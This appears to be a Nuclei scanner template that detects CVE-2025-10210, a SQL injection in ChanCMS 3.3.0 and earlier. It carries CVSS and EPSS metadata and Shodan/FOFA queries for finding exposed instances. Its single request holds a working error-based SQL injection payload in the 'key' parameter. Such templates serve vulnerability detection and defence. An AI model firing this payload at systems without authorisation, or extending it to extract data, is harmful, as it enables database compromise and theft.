id: CVE-2025-10210

info:
  name: ChanCMS <= 3.3.0 - SQL Injection
  author: Yu_Bao
  severity: medium
  description: |
    yanyutao0402 ChanCMS = 3.3.0 contains a SQL injection caused by manipulation of the \"key\" argument in app/modules/api/service/Api.js Search function, letting remote attackers execute arbitrary SQL commands, exploit requires crafted request.
  impact: |
    Remote attackers can execute arbitrary SQL commands, potentially leading to data theft or database compromise.
  remediation: |
    Update to the latest version.
  reference:
    - https://gitee.com/yanyutao0402/ChanCMS
    - https://vuldb.com/?id.323483
    - https://github.com/August829/Yu/blob/main/58ead8e7e08bfb0e5.md
    - https://nvd.nist.gov/vuln/detail/CVE-2025-10210
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2025-10210
    epss-score: 0.00886
    epss-percentile: 0.7598
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"ChanCMS"
    fofa-query: body="ChanCMS"
  tags: cve,cve2025,chancms,sqli

variables:
  rstr: "{{md5(rand_base(6))}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/search?key=%27%20and%20extractvalue(1,concat(0x7e,%27{{rstr}}%27,0x7e))--%20a"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{rstr}}"
          - "XPATH syntax"
        condition: and

      - type: status
        status:
          - 200
          - 500
# digest: 4a0a004730450220451b5b972b6e9e1fda18363498afa96ad1e015c048099146820814b1e06b1972022100b1a7afa8d5eac87961fafb9e2db460a825b9b7bb7c93071c1fcd238b02f8364b:922c64590222798bb761d5b6d8e72950